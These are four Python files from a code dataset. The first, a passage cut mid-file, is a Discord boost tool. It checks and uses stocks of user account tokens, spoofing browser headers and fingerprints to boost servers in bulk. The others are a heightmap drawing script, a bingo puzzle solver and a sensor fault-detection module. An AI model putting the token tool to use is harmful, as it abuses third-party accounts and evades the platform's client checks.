Invite Code, {invite}\" + Fore.WHITE)\r\n            invite_input = input(Fore.CYAN + \"Permanent Invite Link to the server you want to boost [https://discord.gg/[invite_code]]: \" + Fore.WHITE)\r\n            invite = getinviteCode(invite_input)\r\n            valid_invite = validateInvite(invite)\r\n\r\n\r\n        amount_input = inputNumber(Fore.CYAN + \"Amount of Boosts: \" + Fore.WHITE)\r\n        while amount_input % 2 != 0:\r\n            print(Fore.RED + \"Amount of Boosts must be even.\" + Fore.WHITE)\r\n            amount_input = inputNumber(Fore.CYAN + \"Amount of Boosts: \" + Fore.WHITE)\r\n        \r\n        if amount_input/2 > len(open(file, encoding='utf-8').read().splitlines()):\r\n            print()\r\n            print(Fore.RED + \"Not Enough Stock\" + Fore.WHITE)\r\n            print()\r\n            input(\"Press Enter To Continue...\")\r\n            cls()\r\n\r\n            mainmenu()\r\n\r\n\r\n        amount = amount_input\r\n\r\n        EXP = True\r\n        if typeofboost == 90:\r\n            EXP = False\r\n\r\n        threads = []\r\n        no_working = False\r\n        r = 0\r\n        numTokens = int(amount/2)\r\n        all_tokens = get_all_tokens(file)\r\n        tokens_to_use = []\r\n        print(Fore.GREEN + \"Looking for working tokens\" + Fore.WHITE)\r\n        while len(tokens_to_use) != numTokens:\r\n            try:\r\n                token = all_tokens[r]\r\n                if checktoken(token, file) == True:\r\n                    tokens_to_use.append(token)\r\n                r += 1\r\n            except IndexError:\r\n                print(Fore.RED + \"Not Enough Working Tokens in Stock\" + Fore.WHITE)\r\n                no_working = True\r\n                break\r\n        \r\n        if no_working == True:\r\n            input(\"Press Enter To Continue...\")\r\n            cls()\r\n            \r\n            mainmenu()\r\n        else:\r\n            time.sleep(2)\r\n            cls()\r\n            start = time.time()\r\n            print(Fore.GREEN + \"Starting Boosts\" 
+ Fore.WHITE)\r\n            # Use only the tokens that passed the working-token check above.\r\n            for i in range(numTokens):\r\n                token = tokens_to_use[i]\r\n                t = threading.Thread(target=thread_boost, args=(invite, amount, EXP, token))\r\n                t.daemon = True\r\n                threads.append(t)\r\n\r\n            for i in range(numTokens):\r\n                threads[i].start()\r\n            \r\n            for i in range(numTokens):\r\n                threads[i].join()\r\n            \r\n            end = time.time()\r\n            time_taken = round(end-start)\r\n            print(Fore.GREEN + f\"Successfully boosted discord.gg/{invite}, {amount} times in {time_taken} seconds.\")\r\n            \r\n\r\n            print()\r\n            input(\"Press Enter To Continue...\")\r\n            cls()\r\n            \r\n            mainmenu()\r\n    elif choices == \"2\":\r\n        stock()\r\n    elif choices == \"3\":\r\n        nitrochecker()\r\n    elif choices == \"4\":\r\n        print(Fore.RED + \"Exiting!\")\r\n        time.sleep(1.5)\r\n        sys.exit()\r\n    else:\r\n        print(\"invalid option!\")\r\n        time.sleep(1.75)\r\n        cls()\r\n        mainmenu()\r\ndef stock():\r\n    print(Fore.GREEN + f\"3 Months Nitro Tokens Stock: {len(open('3m_tokens.txt', encoding='utf-8').read().splitlines())}\")\r\n    print(f\"3 Months Boost Stock: {len(open('3m_tokens.txt', encoding='utf-8').read().splitlines())*2}\")\r\n    print()\r\n    print(f\"1 Month Nitro Tokens Stock: {len(open('1m_tokens.txt', encoding='utf-8').read().splitlines())}\")\r\n    print(f\"1 Month Boosts Stock: {len(open('1m_tokens.txt', encoding='utf-8').read().splitlines())*2}\" + Fore.WHITE)\r\n\r\ndef validateInvite(invite):\r\n    if '{\"message\": \"Unknown Invite\", \"code\": 10006}' in httpx.get(f\"https://discord.com/api/v9/invites/{invite}\").text:\r\n        return False\r\n    else:\r\n        return True\r\ndef get_all_tokens(filename):\r\n    all_tokens = []\r\n    with open(filename, 'r') as f:\r\n        for line in f.readlines():\r\n            token = line.strip()\r\n            token = find_token(token)\r\n            if token != None:\r\n                all_tokens.append(token)\r\n\r\n    return all_tokens\r\n\r\ndef nitrochecker():\r\n\r\n    three_m_working = 0\r\n    one_m_working = 0\r\n\r\n    three_m_used = 0\r\n    one_m_used = 0\r\n\r\n    three_m_nonitro = 0\r\n    one_m_nonitro = 0\r\n\r\n    three_m_invalid = 0\r\n    one_m_invalid = 0\r\n\r\n    three_m_locked = 0\r\n    one_m_locked = 0\r\n    three_m_tokens = get_all_tokens(\"input/3m_tokens.txt\")\r\n    one_m_tokens = get_all_tokens(\"input/1m_tokens.txt\")\r\n    print(\"Checking 3 Months Nitro Tokens\")\r\n\r\n    if checkEmpty(\"input/3m_tokens.txt\"):\r\n        print(Fore.RED + \"No Stock To Check\" + Fore.WHITE)\r\n    \r\n    else:\r\n\r\n        for token in three_m_tokens: \r\n            file = \"input/3m_tokens.txt\"\r\n            s, headers = get_headers(token)\r\n            profile = validate_token(s, headers)\r\n\r\n            if profile != False:\r\n                boost_data = s.get(f\"https://discord.com/api/v9/users/@me/guilds/premium/subscription-slots\", headers={'Authorization': token})\r\n\r\n                if boost_data.status_code == 403:\r\n                    print(Fore.RED + f\" ✗ {Fore.WHITE}{token} - {profile}{Fore.RED} [LOCKED]\" + Fore.WHITE)\r\n                    removeToken(token, file)\r\n                    three_m_locked += 1\r\n                if len(boost_data.json()) != 0 and (boost_data.status_code == 200 or boost_data.status_code == 201):\r\n                    if boost_data.json()[0]['cooldown_ends_at'] != None:\r\n                        print(Fore.RED + f\" ✗ {Fore.WHITE}{token} - {profile}{Fore.RED} [USED]\" + Fore.WHITE)\r\n                        removeToken(token, file)\r\n                        three_m_used += 1\r\n                if len(boost_data.json()) == 0:\r\n                    removeToken(token, file)\r\n                    print(f\"{Fore.RED} ✗ {Fore.WHITE}{token} - {profile}{Fore.RED} [NO NITRO]\" + Fore.WHITE)\r\n                    three_m_nonitro += 1\r\n                else:\r\n                    if len(boost_data.json()) != 0 and (boost_data.status_code == 200 or boost_data.status_code == 201):\r\n                        if boost_data.json()[0]['cooldown_ends_at'] == None:\r\n\r\n                            
print(f\"{Fore.GREEN} ✓ {Fore.WHITE}{token} - {profile}{Fore.GREEN} [WORKING]\" + Fore.WHITE)\r\n three_m_working += 1\r\n else:\r\n print(Fore.RED + f\" ✗ {Fore.WHITE}{token}{Fore.RED} [INVALID]\" + Fore.WHITE)\r\n removeToken(token, file)\r\n three_m_invalid += 1\r\n print()\r\n print(\"Checking 1 Month Nitro Tokens\")\r\n if checkEmpty(\"input/1m_tokens.txt\"):\r\n print(Fore.RED + \"No Stock To Check\" + Fore.WHITE) \r\n else:\r\n for token in one_m_tokens: \r\n file = \"input/1m_tokens.txt\"\r\n s, headers = get_headers(token)\r\n profile = validate_token(s, headers)\r\n if profile != False:\r\n boost_data = s.get(f\"https://discord.com/api/v9/users/@me/guilds/premium/subscription-slots\", headers={'Authorization': token})\r\n\r\n if boost_data.status_code == 403:\r\n print(Fore.RED + f\" ✗ {Fore.WHITE}{token} - {profile}{Fore.RED} [LOCKED]\" + Fore.WHITE)\r\n removeToken(token, file)\r\n one_m_locked += 1\r\n if len(boost_data.json()) != 0 and boost_data.status_code == 200 or boost_data.status_code == 201:\r\n if boost_data.json()[0]['cooldown_ends_at'] != None:\r\n print(Fore.RED + f\" ✗ {Fore.WHITE}{token} - {profile}{Fore.RED} [USED]\" + Fore.WHITE)\r\n removeToken(token, file)\r\n one_m_used += 1\r\n if len(boost_data.json()) == 0:\r\n removeToken(token, file)\r\n print(f\"{Fore.RED} ✗ {Fore.WHITE}{token} - {profile}{Fore.RED} [NO NITRO]\" + Fore.WHITE)\r\n one_m_nonitro += 1\r\n else:\r\n if len(boost_data.json()) != 0 and boost_data.status_code == 200 or boost_data.status_code == 201:\r\n if boost_data.json()[0]['cooldown_ends_at'] == None:\r\n\r\n print(f\"{Fore.GREEN} ✓ {Fore.WHITE}{token} - {profile}{Fore.GREEN} [WORKING]\" + Fore.WHITE)\r\n one_m_working += 1\r\n else:\r\n print(Fore.RED + f\" ✗ {Fore.WHITE}{token}{Fore.RED} [INVALID]\" + Fore.WHITE)\r\n removeToken(token, file)\r\n one_m_invalid += 1\r\n\r\n print(f\"{Fore.GREEN}WORKING (with nitro) : {Fore.WHITE}{three_m_working} | {Fore.RED}USED : {Fore.WHITE}{three_m_used} | {Fore.RED}NO NITRO : {Fore.WHITE}{three_m_nonitro} | {Fore.RED}LOCKED : {Fore.WHITE}{three_m_locked} | {Fore.RED}INVALID : {Fore.WHITE}{three_m_invalid}\")\r\n print(f\"{Fore.GREEN}WORKING (with nitro) : {Fore.WHITE}{one_m_working} | {Fore.RED}USED : {Fore.WHITE}{one_m_used} | {Fore.RED}NO NITRO : {Fore.WHITE}{one_m_nonitro} | {Fore.RED}LOCKED : {Fore.WHITE}{one_m_locked} | {Fore.RED}INVALID : {Fore.WHITE}{one_m_invalid}\")\r\n\r\ndef checkEmpty(file):\r\n mypath = Path(file)\r\n\r\n if mypath.stat().st_size == 0:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef get_super_properties():\r\n properties = '''{\"os\":\"Windows\",\"browser\":\"Chrome\",\"device\":\"\",\"system_locale\":\"en-GB\",\"browser_user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\",\"browser_version\":\"95.0.4638.54\",\"os_version\":\"10\",\"referrer\":\"\",\"referring_domain\":\"\",\"referrer_current\":\"\",\"referring_domain_current\":\"\",\"release_channel\":\"stable\",\"client_build_number\":102113,\"client_event_source\":null}'''\r\n properties = base64.b64encode(properties.encode()).decode()\r\n return properties\r\n\r\ndef get_fingerprint(s):\r\n try:\r\n fingerprint = s.get(f\"https://discord.com/api/v9/experiments\", timeout=5).json()[\"fingerprint\"]\r\n return fingerprint\r\n except Exception as e:\r\n return \"Error\"\r\n \r\ndef find_token(token):\r\n if ':' in token:\r\n token_chosen = None\r\n tokensplit = token.split(\":\")\r\n for thing in tokensplit:\r\n if '@' not in thing 
and '.' in thing and len(thing) > 30:\r\n                token_chosen = thing\r\n                break\r\n        if token_chosen == None:\r\n            print(f\"Error finding token\", Fore.RED)\r\n            return None\r\n        else:\r\n            return token_chosen\r\n\r\n\r\n    else:\r\n        return token\r\n    \r\ndef removeToken(token: str, file:str):\r\n    with open(file, \"r\") as f:\r\n        fulltokens = f.read().splitlines()\r\n        Tokens = []\r\n        for j in fulltokens:\r\n            p = find_token(j)\r\n            if p is not None:\r\n                Tokens.append(p)\r\n    # Rebuild the list instead of mutating it while iterating over it.\r\n    Tokens = [t for t in Tokens if len(t) >= 5 and t != token]\r\n    open(file, \"w\").write(\"\\n\".join(Tokens))\r\n\r\ndef validate_token(s, headers):\r\n    check = s.get(f\"https://discord.com/api/v9/users/@me\", headers=headers)\r\n    if check.status_code == 200:\r\n        profile_name = check.json()[\"username\"]\r\n        profile_discrim = check.json()[\"discriminator\"]\r\n        profile_of_user = f\"{profile_name}#{profile_discrim}\"\r\n        return profile_of_user\r\n    else:\r\n        return False\r\n    \r\ndef checktoken(token, file):\r\n    s, headers = get_headers(token)\r\n    profile = validate_token(s, headers)\r\n\r\n    if profile != False:\r\n\r\n        boost_data = s.get(f\"https://discord.com/api/v9/users/@me/guilds/premium/subscription-slots\", headers={'Authorization': token})\r\n\r\n\r\n        if boost_data.status_code == 403:\r\n            print(Fore.RED + f\" ✗ {Fore.WHITE}{token} - {profile}{Fore.RED} [LOCKED]\" + Fore.WHITE)\r\n            removeToken(token, file)\r\n            return False\r\n\r\n        if len(boost_data.json()) != 0 and (boost_data.status_code == 200 or boost_data.status_code == 201):\r\n            if boost_data.json()[0]['cooldown_ends_at'] != None:\r\n                print(Fore.RED + f\" ✗ {Fore.WHITE}{token} - {profile}{Fore.RED} [USED]\" + Fore.WHITE)\r\n                removeToken(token, file)\r\n                return False\r\n\r\n        if len(boost_data.json()) == 0 and (boost_data.status_code == 200 or boost_data.status_code == 201):\r\n            print(f\"{Fore.RED} ✗ {Fore.WHITE}{token} - {profile}{Fore.RED} [NO NITRO]\" + Fore.WHITE)\r\n            removeToken(token, file)\r\n            return False\r\n\r\n        else:\r\n            if len(boost_data.json()) != 0 and (boost_data.status_code == 200 or boost_data.status_code == 201):\r\n                if boost_data.json()[0]['cooldown_ends_at'] == None:\r\n                    print(f\"{Fore.GREEN} ✓ {Fore.WHITE}{token} - {profile}{Fore.GREEN} [WORKING]\" + Fore.WHITE)\r\n                    return True\r\n\r\n    else:\r\n        print(Fore.RED + f\" ✗ {Fore.WHITE}{token}{Fore.RED} [INVALID]\" + Fore.WHITE)\r\n        removeToken(token, file)\r\n        return False\r\n    \r\ndef get_headers(token):\r\n    while True:\r\n        s = httpx.Client()\r\n        dcf, sdc = get_cookies(s, \"https://discord.com/\")\r\n        fingerprint = get_fingerprint(s)\r\n        if fingerprint != \"Error\":\r\n            break\r\n    super_properties = get_super_properties()\r\n    headers = {\r\n        'authority': 'discord.com',\r\n        'method': 'POST',\r\n        'path': '/api/v9/users/@me/channels',\r\n        'scheme': 'https',\r\n        'accept': '*/*',\r\n        'accept-encoding': 'gzip, deflate',\r\n        'accept-language': 'en-US',\r\n        'authorization': token,\r\n        'cookie': f'__dcfduid={dcf}; __sdcfduid={sdc}',\r\n        'origin': 'https://discord.com',\r\n        'sec-ch-ua': '\"Google Chrome\";v=\"95\", \"Chromium\";v=\"95\", \";Not A Brand\";v=\"99\"',\r\n        'sec-ch-ua-mobile': '?0',\r\n        'sec-ch-ua-platform': '\"Windows\"',\r\n        'sec-fetch-dest': 'empty',\r\n        'sec-fetch-mode': 'cors',\r\n        'sec-fetch-site': 'same-origin',\r\n        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36',\r\n        'x-debug-options': 'bugReporterEnabled',\r\n        'x-fingerprint': fingerprint,\r\n        'x-super-properties': super_properties,\r\n    }\r\n    return s, headers\r\n\r\ndef 
get_cookies(s, url):\r\n try:\r\n cookieinfo = s.get(url, timeout=5).cookies\r\n dcf = str(cookieinfo).split('__dcfduid=')[1].split(' ')[0]\r\n sdc = str(cookieinfo).split('__sdcfduid=')[1].split(' ')[0]\r\n return dcf, sdc\r\n except:\r\n return \"\", \"\"\r\n \r\ndef printwatermark():\r\n print(Fore.MAGENTA + f'''\r\n\r\n █████╗ ██╗ ██╗██╗ ██╗██╗███████╗ ''' + Fore.LIGHTMAGENTA_EX + ''' ██████╗ ██████╗ ██████╗ ███████╗████████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗\r\n██╔══██╗██║ ██║██║ ██║██║██╔════╝ ██╔══██╗██╔═══██╗██╔═══██╗██╔════╝╚══██╔══╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║\r\n███████║██║ ██║██║ █╗ ██║██║███████╗ ██████╔╝██║ ██║██║ ██║███████╗''' + Fore.MAGENTA +''' ██║ ██║ ██║ ██║██║ ██║██║ ██║\r\n██╔══██║██║ ██║██║███╗██║██║╚════██║ ''' + Fore.LIGHTMAGENTA_EX + ''' ██╔══██╗██║ ██║██║ ██║╚════██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═╝\r\n██║ ██║╚██████╔╝╚███╔███╔╝██║███████║ ██████╔╝╚██████╔╝╚██████╔╝███████║ ██║ ██║ ╚██████╔╝╚██████╔╝███████╗██╗\r\n╚═╝ ╚═╝ ╚═════╝ ╚══╝╚══╝ ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝ ''' + Fore.MAGENTA + ''' ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝\r\n discord.gg/omari\r\n https://github.com/auwii\r\n made by conspiracy#0002/conspiracy#0001 \r\n ''')\r\n \r\n\r\nif __name__ == '__main__':\r\n \r\n cls()\r\n cls()\r\n colorama.init()\r\n \r\n mainmenu()\r\n","repo_name":"conspiracylol/discord-boost-tool","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":19405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43049865053","text":"from PIL import Image, ImageDraw\nimport math\nimport random\n\ndebug = False\nstatus = True\nflows = 32\nradius = 16\nsweep = 8\nsteps = 512\n\nim = Image.open(\"Heightmap.png\")\nim = im.convert(\"RGB\")\nwidth, height = im.size\n\n# we need to generate a list of U,V tuples to pass to the drawing board\ndraw = ImageDraw.Draw(im)\n\nfor q in range(0,flows):\n startUV = (int(random.random()*width),int(random.random()*height))\n listUV = [startUV]\n validUV = True\n \n if status:\n print(\"Path: \" + str(q+1) + \"/\" + str(flows))\n \n valTemp = 255\n \n for j in range(0,steps):\n for i in range(0,sweep):\n angle = i * ((2 * math.pi)/sweep)\n\n uCoord = int(startUV[0] + radius * math.cos(angle))\n vCoord = int(startUV[1] + radius * math.sin(angle))\n \n # DEBUG\n if debug:\n print(\"U: \" + str(uCoord))\n print(\"V: \" + str(vCoord))\n \n # make sure to only use the coordinates if they're in the image's dimensions\n if (0 < uCoord < width) and (0 < vCoord < height):\n\n hVal = im.getpixel((uCoord,vCoord))[0]\n\n # if hval < valTemp, write hval to valTemp and assign coords to locUV\n if (hVal < valTemp):\n valTemp = hVal\n startUV = (uCoord,vCoord)\n \n # confirm UV as valid\n validUV = True\n else:\n validUV = False\n radius += radius\n\n # export the chosen coordinate to the list ONLY if UV is valid\n if validUV:\n listUV.append(startUV)\n\n #draw.line(listUV, fill=(0,0,255), width = 1)\n #draw.point(listUV, fill=(255,255,255))\n \n # draw the gradient line\n for index, span in enumerate(listUV):\n if (index < len(listUV)) and (index != 0):\n draw.line((listUV[index],listUV[index-1]), fill=(0,index,255), width = 4)\n\ndel draw\n\n# write to stdout\nim.save(\"output\", \"PNG\")\nim.show()","repo_name":"skyeterran/Flowmarch","sub_path":"flowmarch.py","file_name":"flowmarch.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16064247218","text":"class 
NumberOnBoard:\n left = None\n above = None\n right = None\n below = None\n marked = False\n\n def __init__(self, number, left=None, above=None):\n self.number = number\n self.left = left\n self.above = above\n\n def add_right(self, right):\n self.right = right\n\n def add_below(self, below):\n self.below = below\n\n def mark(self):\n self.marked = True\n\n def is_not_marked(self):\n return self.marked is False\n\n def get_adjacent_marks(self, only_in_direction: str = None):\n def should_count_as_marked(number: 'NumberOnBoard', direction: str):\n is_direction_match = only_in_direction is None or only_in_direction == direction\n return number is not None and is_direction_match and number.marked\n\n if should_count_as_marked(self.left, 'left'):\n yield self.left, 'left'\n if should_count_as_marked(self.above, 'above'):\n yield self.above, 'above'\n if should_count_as_marked(self.right, 'right'):\n yield self.right, 'right'\n if should_count_as_marked(self.below, 'below'):\n yield self.below, 'below'\n\n\ndef flat_map(xs: list[dict[int, NumberOnBoard]]):\n flattened: [NumberOnBoard] = []\n for ys in xs:\n for y in ys.items():\n flattened.append(y[1])\n return flattened\n\n\ndef get_numbers_from_line(line, separator):\n numbers_raw = line \\\n .rstrip('\\r') \\\n .rstrip('\\n') \\\n .split(separator)\n without_empties = list(filter(lambda n: n != '', numbers_raw))\n return list(map(lambda n: int(n), without_empties))\n\n\ndef get_numbers_on_board(puzzle_input):\n numbers_on_board: list[dict[int, NumberOnBoard]] = []\n for row_number in range(0, 5):\n numbers_in_row = get_numbers_from_line(puzzle_input.readline(), ' ')\n\n numbers_on_board.append({})\n current_row = numbers_on_board[row_number]\n\n for column_number in range(0, len(numbers_in_row)):\n current_number = numbers_in_row[column_number]\n current_row[column_number] = NumberOnBoard(\n current_number,\n None if column_number == 0 else current_row[column_number - 1],\n None if row_number == 0 else numbers_on_board[row_number - 1][column_number])\n if column_number > 0:\n current_row[column_number - 1].right = current_row[column_number]\n if row_number > 0:\n numbers_on_board[row_number - 1][column_number].below = current_row[column_number]\n\n return flat_map(numbers_on_board)\n\n\ndef makes_bingo(number: NumberOnBoard):\n def count_marks_in_direction(current_number, only_in_direction, mark_count=0):\n for adjacent, direction in current_number.get_adjacent_marks(only_in_direction):\n return count_marks_in_direction(adjacent, direction, mark_count + 1)\n return mark_count\n\n horizontal_marks = count_marks_in_direction(number, 'left') + count_marks_in_direction(number, 'right') + 1\n vertical_marks = count_marks_in_direction(number, 'above') + count_marks_in_direction(number, 'below') + 1\n return horizontal_marks == 5 or vertical_marks == 5\n\n\ndef get_score_for_board(numbers_on_board: [NumberOnBoard], random_numbers: [int]):\n numbers_needed = 0\n for random_number in random_numbers:\n numbers_needed += 1\n matching_numbers = filter(lambda n: n.number == random_number, numbers_on_board)\n for matching_number in matching_numbers:\n matching_number.mark()\n if makes_bingo(matching_number):\n unmarked = list(map(lambda n: n.number, filter(lambda n: n.is_not_marked(), numbers_on_board)))\n return sum(unmarked) * matching_number.number, numbers_needed\n\n\ndef print_board(numbers_on_board):\n for index in range(0, len(numbers_on_board)):\n if (index % 5) == 0:\n print('\\n')\n number = numbers_on_board[index]\n print(number.number if 
number.is_not_marked() else 'X', end='')\n        print('\\t', end='')\n    print('\\n')\n\n\ndef main():\n    puzzle_input = open(\"inputs/04.txt\", \"r\")\n    random_numbers = get_numbers_from_line(puzzle_input.readline(), ',')\n\n    lowest_numbers_needed = 9000\n    the_fastest_score = -1\n    most_numbers_needed = -1\n    the_slowest_score = -1\n\n    while puzzle_input.readline() != '':\n        numbers_on_board = get_numbers_on_board(puzzle_input)\n\n        score, numbers_needed = get_score_for_board(numbers_on_board, random_numbers)\n        print_board(numbers_on_board)\n        print(f\"Needed {numbers_needed} numbers to get score of {score}\")\n\n        if lowest_numbers_needed > numbers_needed:\n            lowest_numbers_needed = numbers_needed\n            the_fastest_score = score\n        if most_numbers_needed < numbers_needed:\n            most_numbers_needed = numbers_needed\n            the_slowest_score = score\n\n    print(\"\\n\\n\\n\")\n    print(\"***********************************************************************************************\")\n    print(f\"Least amount of numbers needed was {lowest_numbers_needed} to get score of {the_fastest_score}\")\n    print(f\"Most amount of numbers needed was {most_numbers_needed} to get score of {the_slowest_score}\")\n    print(\"***********************************************************************************************\")\n\n\nmain()\n","repo_name":"vincentspaa/advent-of-code","sub_path":"python/2021/puzzle_4.py","file_name":"puzzle_4.py","file_ext":"py","file_size_in_byte":5368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10668865975","text":"from classify_fault.__init__ import *\nfrom classify_fault.check_boundary import detect_out_of_bounds\nfrom classify_fault.check_drift import detect_drift\nfrom classify_fault.check_frozen import detect_frozen\nfrom classify_fault.check_dynamics import detect_dynamics\nfrom classify_fault.utils.get_value_in_dict import get_value\nfrom classify_fault.set_config import update_config, set_boundary, load_config\n\ndef detect_fault(data, tracking_size, type_to_check=None, \n                 frozen_threshold=None, boundary_limits=None, \n                 dynamic_threshold=None, drift_params=None,\n                 tag=None, config_path:str=None,\n                 boundary_type='fix'):\n    # Set Parameter\n    results, updates = {}, {}\n\n    # load config\n    if config_path is not None:\n        config = load_config(json_file_path=config_path)\n    else:\n        config = None\n\n    # Perform fault detection\n    fault_detection = perform_fault_detection(data, tracking_size, config=config,\n                                              type_to_check=type_to_check, \n                                              frozen_threshold=frozen_threshold, boundary_limits=boundary_limits, \n                                              dynamic_threshold=dynamic_threshold, drift_params=drift_params,\n                                              tag=tag, boundary_type=boundary_type)\n    # Gather results and updates\n    # results[tag] = fault_detection\n    updates[tag] = {\"drift_params\": fault_detection[\"drift_params_update\"], \n                    \"statistic\": fault_detection[\"statistics_update\"], \n                    \"boundary_limits\": fault_detection[\"boundary_limits_update\"]}\n\n    # Update Configuration\n    if config_path is not None and config is not None:\n        update_config(config_path=config_path, updates=updates)\n    \n    return fault_detection\n\n\ndef detect_faults(data, tag_list:list, config_path='./config/variable_config.json'):\n    # validate the input data\n    if not isinstance(data, (np.ndarray, pd.DataFrame)):\n        raise TypeError(\"Data should be a numpy ndarray or a pandas DataFrame\")\n    else:\n        if isinstance(data, pd.DataFrame) and tag_list is None:\n            tag_list = data.columns.to_list()\n        data = data.values\n\n    # check the data shape\n    if data.ndim == 1:\n        warnings.warn(\"For one tag, 
use the 'detect_fault' function.\", UserWarning)\n\n    # validate tag_list\n    if not isinstance(tag_list, (list, tuple)):\n        raise TypeError(\"tag_list should be a list, e.g. tag_list=['tag01', 'tag2', ..., 'tag10']\")\n    if isinstance(tag_list, tuple):\n        warnings.warn(\"Please pass the tag list as a list, not as a tuple.\", UserWarning)\n        tag_list = list(tag_list) \n    \n    # Set Parameter\n    results, updates = {}, {}\n\n    # read the configuration file\n    config = load_config(json_file_path=config_path)\n\n    for i, tag in enumerate(tag_list):\n        # read the required parameters\n        tracking_size = config[tag]['tracking_size']\n        type_to_check = config[tag]['type_to_check']\n        frozen_threshold = config[tag]['frozen_threshold']\n        boundary_limits = config[tag]['boundary_limits']\n        dynamic_threshold = config[tag]['dynamic_threshold']\n        drift_params = config[tag]['drift_params']\n        boundary_type = config[tag]['statistic']['boundary_type']\n\n        target = data[:, i]\n\n        fault_detection = perform_fault_detection(data=target, tracking_size=tracking_size, config=config,\n                                                  type_to_check=type_to_check,\n                                                  frozen_threshold=frozen_threshold, boundary_limits=boundary_limits, \n                                                  dynamic_threshold=dynamic_threshold, drift_params=drift_params,\n                                                  tag=tag, boundary_type=boundary_type)\n        # Gather results and updates\n        results[tag] = fault_detection\n        updates[tag] = {\"drift_params\": fault_detection[\"drift_params_update\"], \n                        \"statistic\": fault_detection[\"statistics_update\"], \n                        \"boundary_limits\": fault_detection[\"boundary_limits_update\"]}\n    \n    # Update Configuration for all tags at once\n    update_config(config_path=config_path, updates=updates)\n\n    return results \n\n\ndef perform_fault_detection(data, tracking_size, config=None, \n                            type_to_check=None, \n                            frozen_threshold=None, boundary_limits=None, \n                            dynamic_threshold=None, drift_params=None,\n                            tag=None, boundary_type='fix'):\n    fault_detected = False\n    values = {\"frozen\": None, \"boundary\": None, \"dynamics\": None, \"drift\": None}\n    frozen_detected, boundary_detected, dynamic_detected, drift_detected = False, False, False, False\n\n    if type_to_check is None:\n        type_to_check = {\"frozen\": True, \"boundary\": True, \"dynamics\": True, \"drift\": True}\n\n    if tracking_size == 0:\n        type_to_check = {\"frozen\": False, \"boundary\": True, \"dynamics\": False, \"drift\": True}\n\n    try:\n        # Frozen Test\n        if type_to_check.get(\"frozen\"):\n            frozen_detected, avg_diff = detect_frozen(data, frozen_threshold, tracking_size)\n            values['frozen'] = avg_diff\n            if frozen_detected:\n                fault_detected = True\n\n        # Boundary Test\n        boundary_limits_update, statistics_update = None, None\n\n        if type_to_check.get(\"boundary\"):\n            x = data[-1]  # most recent data point\n            high, low = boundary_limits['high'], boundary_limits['low']\n\n            result = detect_out_of_bounds(x, high, low)\n            boundary_detected = result[\"result\"][0]\n            values['boundary'] = result['result']\n            if boundary_detected:\n                fault_detected = True\n\n            if 'moving' in boundary_type.lower():\n                statistics_update, boundary_limits_update = {}, {}\n                statistics = config[tag]['statistic']\n                high_updated, low_updated, avg_updated, std_updated, tracked_size = set_boundary(statistics=statistics, \n                                                                                                 x=data[-1], \n                                                                                                 boundary_type='moving')['result']\n                boundary_limits_update['high'] = high_updated\n                boundary_limits_update['low'] = low_updated\n                statistics_update['mean'] = avg_updated\n                statistics_update['std'] = std_updated\n                statistics_update['max'], statistics_update['min'] = max(max(data), statistics['max']), min(min(data), statistics['min'])\n                statistics_update['oldest_value'] = data[0]\n                
statistics_update['boundary_type'] = 'moving'\n                statistics_update['tracked_size'] = tracked_size\n\n        # Dynamic Test\n        if type_to_check.get(\"dynamics\"):\n            dynamic_detected, avg_diff = detect_dynamics(data=data, dynamic_threshold=dynamic_threshold)\n            values['dynamics'] = avg_diff\n            if dynamic_detected:\n                fault_detected = True\n\n        # Drift Test\n        if type_to_check.get(\"drift\"):\n            data_point = data[-1]  # most recent data point\n            average, cusum_threshold, ewma_alpha = drift_params['average'], drift_params['cusum_threshold'], drift_params['ewma_alpha']\n            \n            cusum_plus_init = get_value(dictionary=drift_params, key='cusum_plus', default_value=0)\n            cusum_minus_init = get_value(dictionary=drift_params, key='cusum_minus', default_value=0)\n            result = detect_drift(data_point=data_point, average=average, cusum_threshold=cusum_threshold, ewma_alpha=ewma_alpha,\n                                  C_plus=cusum_plus_init, C_minus=cusum_minus_init)\n\n            cusum_plus=get_value(dictionary=result['CUSUM'], key='C_plus', default_value=0)\n            cusum_minus=get_value(dictionary=result['CUSUM'], key='C_minus', default_value=0)\n            ewma_smoothed=get_value(dictionary=result['EWMA'], key='smoothed_data', default_value=0)\n\n            drift_params_update = {\"cusum_plus\": cusum_plus, \n                                   \"cusum_minus\": cusum_minus,\n                                   \"ewma_smoothed\": ewma_smoothed}\n            # Update Values Dictionary\n            values['drift'] = [cusum_plus, cusum_minus]\n            # if result[\"CUSUM\"][\"detected\"] or result[\"EWMA\"][\"detected\"]:\n            if result[\"CUSUM\"][\"detected\"]:\n                drift_detected = True\n                fault_detected = True\n        else:\n            drift_params_update = None\n        \n        success = True\n        message = \"-\"\n\n    except Exception as E:\n        # A failed check must be reported as unsuccessful.\n        success = False\n        message = f\"{E},\\n {traceback.format_exc()}\"\n\n    fault_detection = {\"success\": success,\n                       \"values\": values,\n                       \"fault_detected\": fault_detected,\n                       \"Frozen\": frozen_detected,\n                       \"Boundary\": boundary_detected,\n                       \"Dynamics\": dynamic_detected,\n                       \"Drift\": drift_detected,\n                       \"statistics_update\": statistics_update,\n                       \"boundary_limits_update\": boundary_limits_update,\n                       \"drift_params_update\": drift_params_update,\n                       \"message\": message}\n    \n    return fault_detection","repo_name":"Kyuhan1230/univariate-fault-detection","sub_path":"classify_fault/fault_detection.py","file_name":"fault_detection.py","file_ext":"py","file_size_in_byte":9517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} 